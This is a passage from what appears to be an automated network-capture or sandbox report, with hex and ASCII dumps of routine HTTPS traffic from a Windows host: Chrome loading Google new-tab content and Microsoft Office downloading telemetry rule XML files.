2024-11-25 23:25:23 UTC	372	IN	Data Raw: 31 66 38 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65 Data Ascii: 1f8d)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
2024-11-25 23:25:23 UTC	1390	IN	Data Raw: 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 Data Ascii: class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u0
2024-11-25 23:25:23 UTC	1390	IN	Data Raw: 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 Data Ascii: 003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d
2024-11-25 23:25:23 UTC	1390	IN	Data Raw: 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20 Data Ascii: ss\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13
2024-11-25 23:25:23 UTC	1390	IN	Data Raw: 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c Data Ascii: 1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,20c1.1,0 2,-0.9 2,
2024-11-25 23:25:23 UTC	1390	IN	Data Raw: 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 32 37 36 2c 33 37 30 30 39 34 39 2c 33 37 30 31 33 38 34 2c 31 30 31 34 32 30 36 37 30 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70 74 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 73 2e 67 62 61 72 5f 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 Data Ascii: enu-content","metadata":{"bar_height":60,"experiment_id":[3700276,3700949,3701384,101420670],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else_safe_script_wrapped_value":"this.gbar_\u003dthis.gbar_\|\|{};(function(_){va
2024-11-25 23:25:23 UTC	763	IN	Data Raw: 20 63 5c 75 30 30 33 64 41 72 72 61 79 28 62 29 3b 66 6f 72 28 6c 65 74 20 64 5c 75 30 30 33 64 30 3b 64 5c 75 30 30 33 63 62 3b 64 2b 2b 29 63 5b 64 5d 5c 75 30 30 33 64 61 5b 64 5d 3b 72 65 74 75 72 6e 20 63 7d 72 65 74 75 72 6e 5b 5d 7d 3b 49 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 48 64 28 62 5c 75 30 30 33 64 5c 75 30 30 33 65 62 2e 73 75 62 73 74 72 28 30 2c 61 2e 6c 65 6e 67 74 68 2b 31 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 61 2b 5c 22 3a 5c 22 29 7d 3b 5f 2e 4a 64 5c 75 30 30 33 64 67 6c 6f 62 61 6c 54 68 69 73 2e 74 72 75 73 74 65 64 54 79 70 65 73 3b 5f 2e 4b 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 Data Ascii: c\u003dArray(b);for(let d\u003d0;d\u003cb;d++)c[d]\u003da[d];return c}return[]};Id\u003dfunction(a){return new _.Hd(b\u003d\u003eb.substr(0,a.length+1).toLowerCase()\u003d\u003d\u003da+\":\")};_.Jd\u003dglobalThis.trustedTypes;_.Kd\u003dclass{constructor
2024-11-25 23:25:23 UTC	391	IN	Data Raw: 31 38 30 0d 0a 69 73 46 69 6e 69 74 65 28 61 29 3f 61 7c 30 3a 76 6f 69 64 20 30 7d 3b 5f 2e 51 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 29 72 65 74 75 72 6e 20 61 3b 69 66 28 74 79 70 65 6f 66 20 61 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 73 74 72 69 6e 67 5c 22 29 7b 69 66 28 21 61 29 72 65 74 75 72 6e 3b 61 5c 75 30 30 33 64 2b 61 7d 69 66 28 74 79 70 65 6f 66 20 61 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 6e 75 6d 62 65 72 5c 22 29 72 65 74 75 72 6e 20 4e 75 6d 62 65 72 2e 69 73 46 69 6e 69 74 65 28 61 29 3f 61 7c 30 3a 76 6f 69 64 20 30 7d 3b 53 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 29 7b 6c 65 74 20 61 5c 75 30 30 33 64 6e 75 Data Ascii: 180isFinite(a)?a\|0:void 0};_.Qd\u003dfunction(a){if(a\u003d\u003dnull)return a;if(typeof a\u003d\u003d\u003d\"string\"){if(!a)return;a\u003d+a}if(typeof a\u003d\u003d\u003d\"number\")return Number.isFinite(a)?a\|0:void 0};Sd\u003dfunction(){let a\u003dnu
2024-11-25 23:25:23 UTC	1390	IN	Data Raw: 38 30 30 30 0d 0a 4c 3a 62 7d 29 7d 63 61 74 63 68 28 62 29 7b 7d 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 55 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 29 7b 54 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 76 6f 69 64 20 30 5c 75 30 30 32 36 5c 75 30 30 32 36 28 54 64 5c 75 30 30 33 64 53 64 28 29 29 3b 72 65 74 75 72 6e 20 54 64 7d 3b 5c 6e 5f 2e 57 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 63 6f 6e 73 74 20 62 5c 75 30 30 33 64 5f 2e 55 64 28 29 3b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 56 64 28 62 3f 62 2e 63 72 65 61 74 65 53 63 72 69 70 74 55 52 4c 28 61 29 3a 61 29 7d 3b 5f 2e 58 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 56 64 29 72 65 74 75 72 6e 20 61 Data Ascii: 8000L:b})}catch(b){}return a};_.Ud\u003dfunction(){Td\u003d\u003d\u003dvoid 0\u0026\u0026(Td\u003dSd());return Td};\n_.Wd\u003dfunction(a){const b\u003d_.Ud();return new _.Vd(b?b.createScriptURL(a):a)};_.Xd\u003dfunction(a){if(a instanceof _.Vd)return a
2024-11-25 23:25:23 UTC	1390	IN	Data Raw: 28 61 29 29 3a 66 65 7c 7c 28 66 65 5c 75 30 30 33 64 6e 65 77 20 68 65 29 7d 3b 5f 2e 6b 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 62 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 73 74 72 69 6e 67 5c 22 3f 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 62 29 3a 62 7d 3b 5f 2e 55 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 5c 75 30 30 33 64 62 7c 7c 64 6f 63 75 6d 65 6e 74 3b 63 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 3f 61 5c 75 30 30 33 64 63 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 61 29 5b 30 5d 3a 28 63 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 2c 61 3f 61 5c 75 30 30 33 64 28 62 Data Ascii: (a)):fe\|\|(fe\u003dnew he)};_.ke\u003dfunction(a,b){return typeof b\u003d\u003d\u003d\"string\"?a.getElementById(b):b};_.U\u003dfunction(a,b){var c\u003db\|\|document;c.getElementsByClassName?a\u003dc.getElementsByClassName(a)[0]:(c\u003ddocument,a?a\u003d(b

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.6	49737	142.250.181.100	443	5028	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:22 UTC	353	OUT	GET /async/newtab_promos HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-25 23:25:23 UTC	933	IN	HTTP/1.1 200 OK Version: 698674578 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Mon, 25 Nov 2024 23:25:23 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-11-25 23:25:23 UTC	35	IN	Data Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a Data Ascii: 1d)]}'{"update":{"promos":{}}}
2024-11-25 23:25:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
21	192.168.2.6	49730	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:22 UTC	192	OUT	GET /rules/rule120615v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 23:25:23 UTC	471	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:22 GMT Content-Type: text/xml Content-Length: 407 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT ETag: "0x8DC582BBAD04B7B" x-ms-request-id: ed9dfa2a-401e-0015-7891-3f0e8d000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T232522Z-174f7845968ljs8phC1EWRe6en0000000ubg0000000006hg x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-25 23:25:23 UTC	407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
22	192.168.2.6	49738	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:22 UTC	192	OUT	GET /rules/rule120619v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 23:25:23 UTC	471	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:23 GMT Content-Type: text/xml Content-Length: 407 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT ETag: "0x8DC582B9698189B" x-ms-request-id: ff98645e-b01e-0001-1091-3f46e2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T232522Z-174f7845968jrjrxhC1EWRmmrs0000000us0000000000240 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-25 23:25:23 UTC	407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
23	192.168.2.6	49735	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:22 UTC	192	OUT	GET /rules/rule120617v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 23:25:23 UTC	471	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:23 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT ETag: "0x8DC582BA310DA18" x-ms-request-id: c665a67d-901e-002a-1b91-3f7a27000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T232523Z-174f7845968xr5c2hC1EWRd0hn0000000be00000000002zd x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-25 23:25:23 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
24	192.168.2.6	49736	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:22 UTC	192	OUT	GET /rules/rule120618v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 23:25:23 UTC	471	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:23 GMT Content-Type: text/xml Content-Length: 486 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT ETag: "0x8DC582B9018290B" x-ms-request-id: dc0e488f-901e-005b-3891-3f2005000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T232523Z-174f7845968nxc96hC1EWRspw80000000ueg0000000000ad x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-25 23:25:23 UTC	486	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
25	192.168.2.6	49741	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:24 UTC	192	OUT	GET /rules/rule120620v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 23:25:25 UTC	471	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:25 GMT Content-Type: text/xml Content-Length: 469 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT ETag: "0x8DC582BBA701121" x-ms-request-id: 417b6c53-401e-0029-0d91-3f9b43000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T232525Z-174f7845968kdththC1EWRzvxn00000006zg00000000024z x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-25 23:25:25 UTC	469	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml 